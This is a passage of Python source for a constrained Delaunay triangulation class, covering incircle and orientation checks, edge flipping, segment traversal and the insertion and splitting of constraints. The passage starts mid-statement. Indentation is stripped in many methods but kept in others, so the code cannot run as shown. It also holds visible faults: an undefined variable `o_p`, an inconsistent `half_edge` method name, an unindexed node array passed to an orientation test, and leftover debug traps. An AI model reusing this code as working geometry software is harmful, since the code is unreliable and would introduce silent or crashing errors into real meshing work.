nodes[0],nodes[1],nodes[2])
self.log.error(msg)
bad_checks.append( (c,n) )
return bad_checks
def check_local_delaunay(self):
""" Check both sides of each edge - can deal with constrained edges.
"""
bad_checks=[] # [ (cell,node),...]
for j in self.valid_edge_iter():
if self.edges['constrained'][j]:
continue
c1,c2 = self.edge_to_cells(j)
if c1<0 or c2<0:
continue
# always check the smaller index -
# might help with caching later on.
c=min(c1,c2)
c_opp=max(c1,c2)
nodes=self.cells['nodes'][c]
pnts=self.nodes['x'][nodes]
# brute force - check them all.
for n in self.cell_to_nodes(c_opp):
if n in nodes:
continue
t=self.nodes['x'][n]
check=robust_predicates.incircle(pnts[0],pnts[1],pnts[2],t)
if check>0:
msg="Node %d is inside the circumcircle of cell %d (%d,%d,%d)"%(n,c,
nodes[0],nodes[1],nodes[2])
self.log.error(msg)
bad_checks.append( (c,n) )
raise Exception('fail')
return bad_checks
def check_orientations(self):
"""
Checks all cells for proper CCW orientation,
return a list of cell indexes of failures.
"""
bad_cells=[]
for c in self.valid_cell_iter():
node_xy=self.nodes['x'][self.cells['nodes'][c]]
if robust_predicates.orientation(*node_xy) <= 0:
bad_cells.append(c)
return bad_cells
    def check_convex_hull(self):
        """ Walk the convex hull (the half-edges bordering the infinite
        cell) and check the orientation of each consecutive node triple.
        Returns a list of offending [a,b,c] triples (positive orientation
        along the hull walk), empty when the hull is properly convex.
        """
        # find an edge on the convex hull, walk the hull and check
        # all consecutive orientations
        e2c=self.edge_to_cells()
        for j in self.valid_edge_iter():
            if e2c[j,0]==self.INF_CELL:
                he=self.halfedge(j,0)
                break
            elif e2c[j,1]==self.INF_CELL:
                he=self.halfedge(j,1)
                break
        else:
            # a 2-D triangulation always has hull edges
            assert False
        he0=he
        bad_hull=[]
        while 1:
            a=he.node_rev()
            b=he.node_fwd()
            he=he.fwd()
            c=he.node_fwd()
            if robust_predicates.orientation(*self.nodes['x'][[a,b,c]])>0:
                bad_hull.append( [a,b,c])
            # stop once the walk returns to the starting half-edge
            if he==he0:
                break
        return bad_hull
def restore_delaunay(self,n):
""" n: node that was just inserted and may have adjacent cells
which do not meet the Delaunay criterion
"""
# n is node for Vertex_handle v
if self.dim() <= 1:
return
# a vertex is shared by faces, but "stores" only one face.
# Face_handle f=v->face();
# This code iterates over the faces adjacent to v
# in ccw order.
# Face_handle next;
# int i;
# Face_handle start(f);
# do {
# i = f->index(v);
# next = f->neighbor(ccw(i)); // turn ccw around v
# propagating_flip(f,i);
# f=next;
# } while(next != start);
# Shaky on the details, but for starters, try marking the CCW sweep
# based on neighbor nodes.
nbr_nodes=self.angle_sort_adjacent_nodes(n)
N=len(nbr_nodes)
for i in range(N):
trav=nbr_nodes[i]
trav_next=nbr_nodes[(i+1)%N]
c=self.nodes_to_cell( [n,trav,trav_next],fail_hard=False)
if c is not None:
for i in [0,1,2]:
if self.cells['nodes'][c,i]==n:
break
else:
assert False
if c is not None:
self.propagating_flip(c,i)
if self.post_check:
bad=self.check_local_delaunay()
if bad:
raise self.GridException("Delaunay criterion violated")
    def propagating_flip(self,c,i):
        """ Flip edges outward from vertex i of cell c until the local
        Delaunay criterion is restored (port of CGAL's
        non_recursive_propagating_flip).
        c: cell, akin to face_handle
        i: index of the originating vertex in cell c.
        """
        # this is taken from non_recursive_propagating_flip
        # track the stack based on the halfedge one place CW
        # from the edge to be flipped.
        edges=[] # std::stack<Edge> edges;
        vp = self.cells['nodes'][c,i] # const Vertex_handle& vp = f->vertex(i);
        p=self.nodes['x'][vp] # const Point& p = vp->point();
        # maybe better to use half-edges here.
        # ordering of edges is slightly different than CGAL.
        # if i gives the vertex,
        # edges.push(Edge(f,i)); # this is the edge *opposite* vp
        # for our ordering, need edge i+1
        edges.append( self.cell_to_halfedge(c,i) )
        while edges: # (! edges.empty()){
            #const Edge& e = edges.top()
            he=edges[-1]
            he_flip=he.fwd()
            # constrained edges are never flipped - just drop them
            if self.edges['constrained'][he_flip.j]:
                edges.pop()
                continue
            nbr=he_flip.cell_opp()
            if nbr>=0:
                # assuming that ON_POSITIVE_SIDE would mean that p (the location of the
                # originating vertex) is *inside* the CCW-defined circle of the neighbor
                # and would thus mean that the delaunay criterion is not satisfied.
                #if ON_POSITIVE_SIDE != side_of_oriented_circle(n, p, true):
                nbr_points= self.nodes['x'][ self.cells['nodes'][nbr] ]
                p_in_nbr = robust_predicates.incircle(nbr_points[0],
                                                      nbr_points[1],
                                                      nbr_points[2],
                                                      p )
                #if side_of_oriented_circle(n, p, true) == ON_POSITIVE_SIDE:
                if p_in_nbr > 0:
                    # violation: flip, then revisit the two newly-exposed edges
                    self.flip_edge(he_flip.j)
                    extra=he.rev().opposite()
                    edges.append(extra)
                    continue
            edges.pop() # drops last item
            continue
def find_intersected_elements(self,nA,nB):
"""
returns a history of the elements traversed.
this includes:
('node',<node index>)
('edge',<half edge>)
('cell',<cell index>)
note that traversing along an edge is not included - but any
pair of nodes in sequence implies an edge between them.
"""
assert nA!=nB
assert not self.nodes['deleted'][nA]
assert not self.nodes['deleted'][nB]
# traversal could encounter multiple types of elements
trav=('node',nA)
A=self.nodes['x'][nA]
B=self.nodes['x'][nB]
history=[trav]
if self.dim()==1:
assert trav[0]=='node'
n_nbrs=self.node_to_nodes(trav[1])
for n_nbr in n_nbrs:
if n_nbr==nB:
history.append( ('node',nB) )
return history
if ordered( A,
self.nodes['x'][n_nbr],
B ):
trav=('node',n_nbr)
history.append( trav )
he=self.nodes_to_halfedge(nA,n_nbr)
break
else:
assert False # should never get here
while trav!=('node',nB):
he=he.fwd()
trav=('node',he.node_fwd())
history.append(trav)
return history
else:
while trav!=('node',nB):
# DBG!
if len(history)>1 and history[0]==history[1]:
import pdb
pdb.set_trace()
if trav[0]=='node':
ntrav=trav[1]
for c in self.node_to_cells(ntrav):
cn=self.cell_to_nodes(c)
# print "At node %d, checking cell %d (%s)"%(ntrav,c,cn)
ci_trav=list(cn).index(ntrav) # index of ntrav in cell c
nD=cn[(ci_trav+1)%3]
nE=cn[(ci_trav+2)%3]
if nD==nB or nE==nB:
trav=('node',nB)
# print "Done"
break
D=self.nodes['x'][nD]
oD=robust_predicates.orientation( A,B,D )
if oD>0:
continue
N=self.nodes['x'][ntrav]
if oD==0 and ordered(N,D,B):
# fell exactly on the A-B segment, and is in the
# right direction
trav=('node',nD)
break
E=self.nodes['x'][nE]
oE=robust_predicates.orientation( A,B,E )
if oE<0:
continue
if oE==0 and ordered(N,E,B):
# direction
trav=('node',nE)
break
j=self.cell_to_edges(c)[ (ci_trav+1)%3 ]
j_nbrs=self.edge_to_cells(j)
# AB crosses an edge - record the edge, and the side we are
# approaching from:
history.append( ('cell',c) )
if j_nbrs[0]==c:
trav=('edge',self.halfedge(j,0))
# making sure I got the 0/1 correct
assert trav[1].cell()==c
break
elif j_nbrs[1]==c:
trav=('edge',self.halfedge(j,1))
# ditto
assert trav[1].cell()==c
break
assert False
elif trav[0]=='edge':
he=trav[1].opposite()
#jnodes=self.edges['nodes'][j]
# have to choose between the opposite two edges or their common
# node:
c_next=he.cell()
history.append( ('cell',c_next) )
nD=he.fwd().node_fwd()
# print "Entering cell %d with nodes %s"%(c_next,self.cell_to_nodes(c_next))
oD=robust_predicates.orientation( A,B, self.nodes['x'][nD] )
if oD==0:
trav=('node',nD)
elif oD>0:
# going to cross
trav=('edge',he.fwd())
else:
trav=('edge',he.rev())
else:
assert False
history.append(trav)
return history
def locate_for_traversal_outside(self,p,p_other,loc_face,loc_type,loc_index):
"""
Helper method for locate_for_traversal()
handle the case where p is outside the triangulation, so loc_type
is either OUTSIDE_AFFINE_HULL or OUTSIDE_CONVEX_HULL
returns
('edge',<half-edge>)
('node',<node>)
(None,None) -- the line between p and p_other doesn't intersect the triangulation
"""
dim=self.dim()
if dim<0:
# there are no nodes, no work to be done
return (None,None)
elif dim==0:
# a single node. either we'll intersect it, or not.
N=six.next(self.valid_node_iter()) # get the only valid node
pN=self.nodes['x'][N]
# p_other could be coincident with N:
if (pN[0]==p_other[0]) and (pN[1]==p_other[1]):
return ('node',N)
# or we have to test for pN falling on the line between p,p_other
oN=robust_predicates.orientation(p, pN, p_other)
# either the segment passes through the one node, or doesn't intersect
# at all:
if oN==0 and ordered(p, pN, p_other):
return ('node',N)
else:
return (None,None)
elif dim==1:
# This could be much smarter, but current use case has this as a rare
# occasion, so just brute force it. find a half-edge, make sure it points
# towards us, and go.
if loc_type==self.OUTSIDE_AFFINE_HULL:
# we know that p is not on the line, but p_other could be.
# get an edge:
j=six.next(self.valid_edge_iter())
he=self.halfedge(j,0)
# get a half-edge facing p:
oj=robust_predicates.orientation(p,
self.nodes['x'][he.node_rev()],
self.nodes['x'][he.node_fwd()])
assert oj!=0.0 # that would mean we're collinear
# if the left side of he is facing us,
if oj>0:
# good - the left side of he, from rev to fwd, is facing p.
pass
else:
# flip it.
he=he.opposite()
# first - check against p_other - it could be on the same side
# of the line, on the line, or on the other side of the line.
ojo=robust_predicates.orientation(p_other,
self.nodes['x'][he.node_rev()],
self.nodes['x'][he.node_fwd()])
if ojo>0:
# p_other is on the same side of the line as p
return (None,None)
elif ojo==0:
# still have to figure out whether p_other is in the line or
# off the end.
o_loc_face,o_loc_type,o_loc_index=self.locate(p_other)
# just saw that it was in line, so better not be outside affine hull
assert o_loc_type!=self.OUTSIDE_AFFINE_HULL
if o_loc_type==self.OUTSIDE_CONVEX_HULL:
# a point off the line to a point beyond the ends of the line -
# no intersection.
return (None,None)
else:
if o_loc_type==self.IN_VERTEX:
return ('node',o_loc_index)
elif o_loc_type==self.IN_EDGE:
# This had been just returning the index, but we should
# be return half-edge.
# Make sure it faces p:
he=self.halfedge(o_loc_index,0)
oj2=robust_predicates.orientation(p,
self.nodes['x'][he.node_rev()],
self.nodes['x'][he.node_fwd()])
assert oj2!=0.0 # that would mean we're collinear
# if the left side of he is facing us,
if oj2>0:
# good - the left side of he, from rev to fwd, is facing p.
pass
else:
# flip it.
he=he.opposite()
return ('edge',he)
# shouldn't be possible
assert False
else: # p_other is on the other side
o_rev=robust_predicates.orientation(p,
self.nodes['x'][he.node_rev()],
p_other)
if o_rev==0.0:
return ('node',he.node_rev())
if o_rev > 0:
# rev is to the right of the p--p_other line,
# so walk forward...
A=p ; B=p_other
else:
# flip it around to keep the loop logic the same.
# note that this results in one extra loop, since rev
# becomes fwd and we already know that rev is not
# far enough over. whatever.
A=p_other ; B=p
he=he.opposite()
while 1:
n_fwd=he.node_fwd()
o_fwd=robust_predicates.orientation(A,
self.nodes['x'][n_fwd],
B)
if o_fwd==0.0:
return ('node',n_fwd)
if o_fwd<0:
return ('edge',he) # had been he.j, but we should return half-edge
# must go further!
he_opp=he.opposite()
he=he.fwd()
if he == he_opp: # went round the end - no intersection.
return (None,None)
else: # OUTSIDE_CONVEX_HULL
# points are in a line, and we're on that line but off the end.
# in this case, loc_index gives a nearby node
# so either p_other is also on the line, and the answer
# is ('node',loc_index)
# or it's not on the line, and the answer is (None,None)
orient = robust_predicates.orientation(p,
self.nodes['x'],
p_other)
if orient!=0.0:
return (None,None)
if ordered(p,self.nodes['x'][loc_index],p_other):
return ('node',loc_index)
else:
return (None,None)
elif dim==2:
# use that to get a half-edge facing p...
# had done this, but loc_index is already a half edge
# he_original = he = self.halfedge(loc_index,0)
he_original = he = loc_index
# make sure we got the one facing out
if he.cell()>=0:
he=he.opposite()
assert he.cell()<0
# brute force it
while 1:
# does this edge, or one of it's nodes, fit the bill?
n_rev=he.node_rev()
n_fwd=he.node_fwd()
o_j=robust_predicates.orientation(p,
self.nodes['x'][n_rev],
self.nodes['x'][n_fwd])
if o_j<0:
# this edge is facing away from p - not a candidate.
pass
else:
# note that we could be collinear, o_j==0.0.
o_rev=robust_predicates.orientation(p,self.nodes['x'][n_rev],p_other)
o_fwd=robust_predicates.orientation(p,self.nodes['x'][n_fwd],p_other)
if o_rev == 0.0:
if o_fwd == 0.0:
assert o_j==0.0
if ordered(p,self.nodes['x'][n_rev],self.nodes['x'][n_fwd]):
return ('node',n_rev)
else:
return ('node',n_fwd)
else:
return ('node',n_rev)
elif o_rev>0:
if o_fwd<0:
# found the edge!
return ('edge',he) # had been he.j
elif o_fwd==0:
return ('node',n_fwd)
else:
# the whole edge is on the wrong side of the segment
pass
else: # o_rev<0
pass
he=he.fwd()
if he==he_original:
# none satisfied the intersection
return (None,None)
def locate_for_traversal(self,p,p_other):
""" Given a point [x,y], reformat the result of
self.locate() to be compatible with the traversal
algorithm below. In cases where p is outside the
existing cells/edges/nodes, use the combination of p and p_other
to figure out the first element which would be hit.
"""
# Here - figure out which cell, edge or node corresponds to pB
loc_face,loc_type,loc_index=self.locate(p)
# not ready for ending point far away, outside
if loc_type in [self.OUTSIDE_AFFINE_HULL,self.OUTSIDE_CONVEX_HULL]:
return self.locate_for_traversal_outside(p,p_other,loc_face,loc_type,loc_index)
elif loc_type == self.IN_VERTEX:
if loc_face == self.INF_CELL:
feat=('node', loc_index)
else:
feat=('node', self.cells['nodes'][loc_face, loc_index])
elif loc_type == self.IN_EDGE:
# This should be a half-edge.
# The half-edge is chosen such that it either faces p_other, or
# if all four points are collinear, the ordering is rev -- p -- fwd -- p_other
# or rev -- p -- p_other -- fwd.
he=self.half_edge(loc_index,0) # start with arbitrary orientation
p_rev,p_fwd = self.nodes['x'][ he.nodes() ]
o_p_other = robust_predicates.orientation(p_other, p_rev, p_fwd)
if o_p==0.0:
# should this use rel_ordered instead?
if ordered(p_rev,p,p_other):
# good - we're looking along, from rev to fwd
pass
else:
he=he.opposite()
elif o_p<0:
he=he.opposite()
else:
pass
feat=('edge', he)
elif loc_type == self.IN_FACE:
feat=('cell', loc_face)
else:
assert False # shouldn't happen
return feat
def gen_intersected_elements(self,nA=None,nB=None,pA=None,pB=None):
"""
This is a new take on find_intersected_elements, with changes:
1. Either nodes or arbitrary points can be given
2. Elements are returned as a generator, rather than compiled into a list
and returned all at once.
3. Traversing along an edge was implied in the output of find_intersected_elements,
but is explicitly included here as a node--half_edge--node sequence.
returns a history of the elements traversed.
this includes:
('node',<node index>)
('edge',<half edge>)
('cell',<cell index>)
Notes:
The starting and ending features are included. If points were given
instead of nodes, then the feature here may be a cell, edge or node.
When the point is outside the convex hull or affine hull, then there is not a
corresponding feature (since otherwise one would assume that the feature
is truly intersected). The first feature returned is simply the first feature
encountered along the path, necessarily an edge or node, not a face.
"""
# verify that it was called correctly
if (nA is not None) and (nB is not None):
assert nA!=nB
assert (nA is None) or (not self.nodes['deleted'][nA])
assert (nB is None) or (not self.nodes['deleted'][nB])
assert (nA is None) != (pA is None)
assert (nB is None) != (pB is None)
dim=self.dim()
if nA is not None:
A=self.nodes['x'][nA]
trav=('node',nA)
else:
A=pA # trav set below
if nB is not None:
B=self.nodes['x'][nB]
end=('node',nB)
else:
B=pB # trav set below
if nA is None:
trav=self.locate_for_traversal(A,B)
if trav[0] is None:
return # there are not intersections
if nB is None:
end=self.locate_for_traversal(B,A)
# but the orientation of an edge has to be flipped
if end[0]=='edge':
end=(end[0],end[1].opposite())
# keep tracks of features crossed, including starting/ending
assert trav[0] is not None
history=[trav]
yield trav
if trav==end:
return
if dim==0:
# already yielded the one possible intersection
# but this case should be caught by the return just above
assert False
return
elif dim==1:
# in the case where p -- p_other crosses the 1-dimensional set of
# nodes, trav==end, and we already returned above.
# otherwise, we walk along the edges and nodes
if trav[0]=='node': # get a first half-edge going in the correct direction
n_nbrs=self.node_to_nodes(trav[1])
for n_nbr in n_nbrs:
if (ordered( A,
self.nodes['x'][n_nbr],
B ) or
np.all(B==self.nodes['x'][n_nbr])):
he=self.nodes_to_halfedge(nA,n_nbr)
break
else:
assert False
trav=('edge',he)
history.append(trav)
yield trav
else:
assert trav[0]=='edge'
he=trav[1]
while trav != end:
trav=('node',he.node_fwd())
history.append(trav)
yield trav
if trav==end:
break
he=he.fwd()
trav=('edge',he)
history.append(trav)
yield trav
return
else: # dim==2
while trav!=end:
if trav[0]=='node':
# Crossing through a node
ntrav=trav[1]
N=self.nodes['x'][ntrav]
for c in self.node_to_cells(ntrav):
cn=self.cell_to_nodes(c)
# print "At node %d, checking cell %d (%s)"%(ntrav,c,cn)
ci_trav=list(cn).index(ntrav) # index of ntrav in cell c
# the other two nodes of the cell
nD=cn[(ci_trav+1)%3]
nE=cn[(ci_trav+2)%3]
# maybe this can be folded in below
#if end[0]=='node' and (end[1] in [nD,nE]):
# # trav=('node',nB)
# trav=end
# break
# Here
D=self.nodes['x'][nD]
oD=robust_predicates.orientation( A,B,D )
if oD>0:
# D is to the right of E, and our target, A is to the right
# of both, so this cell is not good
continue
if oD==0 and np.dot(B-A,D-N)>0: # ordered(A,N,D):
# used to test for ordered(N,D,B), but B could be on the
# edge, at D, or beyond D. Test with A to know that the
# edge is going in the right direction, then check for where
# B might fall.
# HERE: This is a problem, though, because it's possible for
# A==N.
# What I really want is for A-B to be in the same direction
# as N-D.
# could test a dot product, but that invites some roundoff
# in sinister situations. The differencing is probably not
# a big deal - if we can represent the absolute values
# distinctly, then we can certainly represent their differences.
# the multiplication could lead to numbers which are too small
# to represent. Any of these issues require absurdly small
# values/offsets in the input nodes, and we have already
# established that these all lie on a line and are distinct.
#
# The possible positive orderings
# [A=N] -- D -- B
# A -- N -- D -- B
# [A=N] -- [D==B]
# [A=N] -- B -- D
#
# fell exactly on the A-B segment, and is in the
# right direction
# Announce the edge, which could be the end of the traversal
trav=('edge',self.nodes_to_halfedge(ntrav,nD))
history.append(trav)
yield trav
if trav==end:
return
# And on to the node:
trav=('node',nD)
break # and we've completed this step
E=self.nodes['x'][nE]
oE=robust_predicates.orientation( A,B,E )
if oE<0:
# A is to the left of E
continue
if oE==0 and np.dot(B-A,E-N): # ordered(A,N,E):
# Same as above - establish that it goes in the correct direction.
# again, the dot product is mildly dangerous
# again - fell exactly on the segment A-B, it's in the right
# direction.
trav=('edge',self.nodes_to_halfedge(ntrav,nE))
history.append(trav)
yield trav
if trav==end:
return
trav=('node',nE)
break
# if we get to here, then A--B passes through the cell, and either
# we stop at this cell, or A--B crosses the opposite edge:
trav=('cell',c)
if trav==end:
# don't try to traverse the cell - we're done!
# trav will get appended below
break
else:
# announce the cell, and move on to the edge
history.append(trav)
yield trav
trav=None # avoid confusion, clear this out
# AB crosses an edge - record the edge, and the side we are
# approaching from:
j=self.cell_to_edges(c)[ (ci_trav+1)%3 ]
j_nbrs=self.edge_to_cells(j)
if j_nbrs[0]==c:
trav=('edge',self.halfedge(j,0))
elif j_nbrs[1]==c:
trav=('edge',self.halfedge(j,1))
else:
assert False
# making sure I got the 0/1 correct
assert trav[1].cell()==c
break
elif trav[0]=='edge':
# trav[1].cell() is the cell we just left
# this then is the half-edge facing the cell we're
# entering
he=trav[1].opposite()
c_next=he.cell()
trav=('cell',c_next)
if trav==end:
pass # done!
else:
# have to choose between the opposite two edges or their common
# node.
# record the cell we just passed through
history.append(trav)
yield trav
nD=he.fwd().node_fwd()
# print "Entering cell %d with nodes %s"%(c_next,self.cell_to_nodes(c_next))
oD=robust_predicates.orientation( A,B, self.nodes['x'][nD] )
if oD==0:
trav=('node',nD)
elif oD>0:
# going to cross the edge "on the right" (I think)
trav=('edge',he.fwd())
else:
# going to cross the edge "on the left"
trav=('edge',he.rev())
else:
assert False
history.append(trav)
yield trav
return
    def add_constraint(self,nA,nB):
        """ Constrain the edge between nodes nA and nB, retriangulating
        the region it crosses as needed, and return the edge index.
        Raises DuplicateConstraint if that edge is already constrained,
        self.ConstraintCollinearNode if a node falls exactly on the new
        segment, and IntersectingConstraints if it would cross an
        existing constrained edge.
        """
        jAB=self.nodes_to_edge([nA,nB])
        if jAB is not None:
            # no work to do - topology already good.
            if self.edges['constrained'][jAB]:
                raise DuplicateConstraint(nodes=[nA,nB])
            self.edges['constrained'][jAB]=True
            return jAB
        # inserting an edge from 0-5.
        int_elts=self.find_intersected_elements(nA,nB)
        # Now we need to record the two holes bordering the new edge:
        left_nodes=[nA] # will be recorded CW
        right_nodes=[nA] # will be recorded CCW
        # Iterate over the crossed elements, checking that the new
        # edge doesn't encounter any collinear nodes or other constrained
        # edges. Build up the nodes of the holes at the same time.
        dead_cells=[]
        dead_edges=[]
        for elt in int_elts[1:-1]:
            if elt[0]=='node':
                raise self.ConstraintCollinearNode("Constraint intersects a node",
                                                   node=elt[1])
            if elt[0]=='cell':
                dead_cells.append(elt[1])
            if elt[0]=='edge':
                if self.edges['constrained'][ elt[1].j ]:
                    raise IntersectingConstraints("Constraint intersects a constraint",
                                                  edge=elt[1].j )
                # accumulate hole boundary nodes, skipping duplicates
                next_left=elt[1].node_fwd()
                if left_nodes[-1]!=next_left:
                    left_nodes.append(next_left)
                next_right= elt[1].node_rev()
                if right_nodes[-1]!=next_right:
                    right_nodes.append(next_right)
                dead_edges.append(elt[1].j)
        left_nodes.append(nB)
        right_nodes.append(nB)
        # reverse so both holes are traversed CCW for fill_hole
        left_nodes = left_nodes[::-1]
        # tricky business here
        # but the delaunay business is only invoked on node operations - leaving
        # the edge/cell operations free and clear to violate invariants
        for c in dead_cells:
            self.delete_cell(c)
        for j in dead_edges:
            self.delete_edge(j)
        j=self.add_edge(nodes=[nA,nB],constrained=True)
        # and then sew up the holes!
        self.fill_hole( left_nodes )
        self.fill_hole( right_nodes )
        return j
def remove_constraint(self,nA=None,nB=None,j=None):
""" Assumes that there exists a constraint between nodes
nA and nB (or that the edge given by j is constrained).
The constrained flag is removed for the edge, and if
the Delaunay criterion is no longer satisfied edges are
flipped as needed.
"""
if j is None:
j=self.nodes_to_edge([nA,nB])
assert self.edges['constrained'][j]
self.edges['constrained'][j]=False
c1,c2=self.edge_to_cells(j)
if (c1>=0) and (c2>=0):
c=c1 # can we just propagate from one side?
for ni,n in enumerate(self.cell_to_nodes(c1)):
if n not in self.edges['nodes'][j]:
self.propagating_flip(c1,ni)
break
if self.post_check:
self.check_local_delaunay()
def node_to_constraints(self,n):
return [j
for j in self.node_to_edges(n)
if self.edges['constrained'][j]]
def init_from_grid(self,g,node_coordinate='x',set_valid=False,
valid_min_area=1e-2,on_intersection='exception'):
"""
Initialize from the nodes and edges of an existing grid, making
existing edges constrained
node_coordinate: supply the name of an alternate coordinate defined
on the nodes. g.nodes[node_coordinate] should be an [Ncell,2] field.
set_valid: if True, add a 'valid' field for cells, and set to Tru
for cells of the triangulation that have finite area and fall
within the src grid g.
on_intersection:
'exception': intersecting edges in the input grid raise an error.
'insert': at intersecting edges construct and insert a new node.
"""
if set_valid:
self.add_cell_field('valid',np.zeros(self.Ncells(),np.bool8),
on_exists='pass')
# Seems that the indices will get misaligned if there are
# deleted nodes.
# TODO: add node index mapping code here.
assert np.all( ~g.nodes['deleted'] )
self.bulk_init(g.nodes[node_coordinate][~g.nodes['deleted']])
all_segs=[ g.edges['nodes'][j]
for j in g.valid_edge_iter() ]
while all_segs:
nodes=all_segs.pop(0)
if on_intersection=='exception':
self.add_constraint( *nodes )
else:
self.add_constraint_and_intersections( *nodes )
if set_valid:
from shapely import geometry
self.cells['valid']=~self.cells['deleted']
# Maybe unnecessary. Had some issues with 0 fill values here.
self.cells['_area']=np.nan
self.cells['_center']=np.nan
areas=self.cells_area()
self.cells['valid'][areas<=valid_min_area]=False
poly=g.boundary_polygon()
centroids=self.cells_centroid()
for c in np.nonzero(self.cells['valid'])[0]:
if not poly.contains( geometry.Point(centroids[c]) ):
self.cells['valid'][c]=False
    def add_constraint_and_intersections(self,nA,nB,on_exists='exception'):
        """
        Like add_constraint, but in the case of intersections with existing constraints
        insert new nodes as needed and update existing and new constrained edges.
        on_exists: 'exception' (re-raise DuplicateConstraint), 'ignore'
        (reuse the existing edge), or 'stop' (return what was added so far).
        Returns ([nodes along the constraint],[constrained edge indices]).
        """
        all_segs=[ [nA,nB] ]
        result_nodes=[nA]
        result_edges=[]
        while all_segs:
            nA,nB=all_segs.pop(0)
            try:
                j=self.add_constraint(nA,nB)
            except IntersectingConstraints as exc:
                if isinstance(exc,ConstraintCollinearNode):
                    # split at the collinear node and retry both halves
                    all_segs.insert(0, [nA,exc.node] )
                    all_segs.insert(1, [exc.node,nB] )
                    continue
                else:
                    # crossed an existing constraint: insert a node at the
                    # intersection and retry both halves
                    j_other=exc.edge
                    assert j_other is not None
                    segA=self.nodes['x'][self.edges['nodes'][j_other]]
                    segB=self.nodes['x'][[nA,nB]]
                    x_int,alphas=segment_segment_intersection(segA,segB)
                    # Getting an error where x_int is one of the endpoints of
                    # segA. This is while inserting a contour that ends on
                    # the boundary.
                    n_new=self.split_constraint(j=j_other,x=x_int)
                    if nB!=n_new:
                        all_segs.insert(0,[n_new,nB])
                    if nA!=n_new:
                        all_segs.insert(0,[nA,n_new])
                    continue
            except DuplicateConstraint as exc:
                if on_exists=='exception':
                    raise
                elif on_exists=='ignore':
                    j=self.nodes_to_edge(nA,nB)
                elif on_exists=='stop':
                    break
                else:
                    assert False,"Bad value %s for on_exists"%on_exists
            result_nodes.append(nB)
            assert j is not None
            result_edges.append(j)
        return result_nodes,result_edges
    def split_constraint(self,x,j):
        """ Split constrained edge j at point x: remove the constraint,
        add (or find) a node at x, constrain the two sub-segments, and
        copy j's remaining edge fields onto them.
        Returns the index of the inserted node.
        """
        nodes_other=self.edges['nodes'][j].copy()
        # snapshot j's fields before remove_constraint/add_constraint
        # invalidate them
        j_data=unstructured_grid.rec_to_dict(self.edges[j].copy())
        self.remove_constraint(j=j)
        n_new=self.add_or_find_node(x=x)
        js=[]
        if nodes_other[0]!=n_new:
            js.append( self.add_constraint(nodes_other[0],n_new) )
        if n_new!=nodes_other[1]:
            js.append( self.add_constraint(n_new,nodes_other[1]) )
        for f in j_data:
            # topology fields are managed by add_constraint itself
            if f in ['nodes','cells','deleted']: continue
            self.edges[f][js]=j_data[f]
        return n_new
    def add_constrained_linestring(self,coords,
                                   on_intersection='exception',
                                   on_exists='exception',
                                   closed=False):
        """
        Constrain a polyline given by coords, optionally inserting new
        nodes as needed along the way.
        on_intersection: when a constraint intersects an existing constraint,
        'exception' => re-raise the exception
        'insert' => insert a constructed node, and divide the new and old constraints.
        on_exists: when a constraint to be inserted already exists,
        'exception' => re-raise the exception
        'ignore' => keep going
        'stop' => return
        closed: Whether the first and last nodes are also connected
        returns [list of nodes],[list of edges]
        """
        nodes=[self.add_or_find_node(x=x)
               for x in coords]
        result_nodes=[nodes[0]]
        result_edges=[]
        if not closed:
            ab_list=zip(nodes[:-1],nodes[1:])
        else:
            # wrap around to close the ring
            ab_list=zip(nodes,np.roll(nodes,-1))
        for a,b in ab_list:
            if on_intersection=='insert':
                sub_nodes,sub_edges=self.add_constraint_and_intersections(a,b,
                                                                          on_exists=on_exists)
                result_nodes+=sub_nodes[1:]
                result_edges+=sub_edges
                # a short sub_nodes means the helper stopped early
                if (on_exists=='stop') and (sub_nodes[-1]!=b):
                    print("Stopping early")
                    break
            else:
                try:
                    j=self.add_constraint(a,b)
                except DuplicateConstraint as exc:
                    if on_exists=='exception':
                        raise
                    elif on_exists=='stop':
                        break
                    elif on_exists=='ignore':
                        j=self.nodes_to_edge(a,b)
                result_nodes.append(b)
                result_edges.append(j)
        return result_nodes,result_edges
    def bulk_init_slow(self,points):
        # Deliberate guard: incremental insertion is far too slow for bulk
        # initialization; use the scipy-based bulk_init() instead.
        raise Exception("No - it's really slow.  Don't do this.")
    def bulk_init(self,points): # ExactDelaunay
        """
        Initialize the triangulation from an (N,2) point array in one shot
        via scipy.spatial.Delaunay, populating self.nodes, self.cells and
        the edge/cell adjacency.  Falls back to bulk_init_slow() when scipy
        is unavailable.
        """
        if spatial is None:
            return self.bulk_init_slow(points)
        # looks like centering this affects how many cells Delaunay
        # finds. That's lame.
        sdt = spatial.Delaunay(points-points.mean(axis=0))
        self.nodes=np.zeros( len(points), self.node_dtype)
        self.cells=np.zeros( sdt.vertices.shape[0], self.cell_dtype)
        self.nodes['x']=points
        self.cells['nodes']=sdt.vertices
        # looks like it's CGAL style:
        # neighbor[1] shares nodes[0] and nodes[2]
        # vertices are CCW
        for c in range(self.Ncells()):
            for i,(a,b) in enumerate(circular_pairs(self.cells['nodes'][c])):
                # first time - that would be i=0, and the first two nodes.
                # but for neighbors, it's indexed by the opposite node. so the edge
                # connected the nodes[0]--nodes[1] corresponds with neighbor 2.
                c_nbr=sdt.neighbors[c,(i+2)%3]
                # c_nbr==-1 on convex hull.
                # only worry about cases where c is larger, so each edge is
                # created exactly once
                if c<c_nbr:
                    continue
                if c_nbr<0:
                    c_nbr=self.INF_CELL
                j=self.add_edge(nodes=[a,b],
                                cells=[c,c_nbr])
                # and record in the cell, too
                self.cells['edges'][c,i]=j
                if c_nbr!=self.INF_CELL:
                    # find the matching (reversed) edge slot in the neighbor
                    nbr_nodes=self.cells['nodes'][c_nbr]
                    for i_nbr in [0,1,2]:
                        if nbr_nodes[i_nbr]==b and nbr_nodes[(i_nbr+1)%3]==a:
                            self.cells['edges'][c_nbr,i_nbr]=j
                            break
                    else:
                        # adjacency from scipy must be mutual
                        assert False
    def constrained_centers(self):
        """
        For cells with no constrained edges, return the circumcenter.
        For cells with one or more constrained edges, return the centroid
        instead.
        The details may evolve, but the purpose is to get a point which
        is inside the domain and can be used like a circumcenter (i.e.
        approximately lies on the medial axis of the continuous boundary).
        """
        ccs=self.cells_center(refresh=True) # circumcenters
        centroids=self.cells_centroid()
        e2c=self.edge_to_cells() # recalc=True)
        # cells adjacent to at least one constrained edge
        cell_with_constraint=np.unique( e2c[ self.edges['constrained']] )
        result=ccs.copy()
        result[cell_with_constraint] = centroids[cell_with_constraint]
        return result
# TODO: def constrained_radii(self):
# Calculate the usual circumradius, but for centers which were
# adjusted due to a constrained edge also check point-segment
# distances.
    def point_clearance(self,x,hint=None):
        """
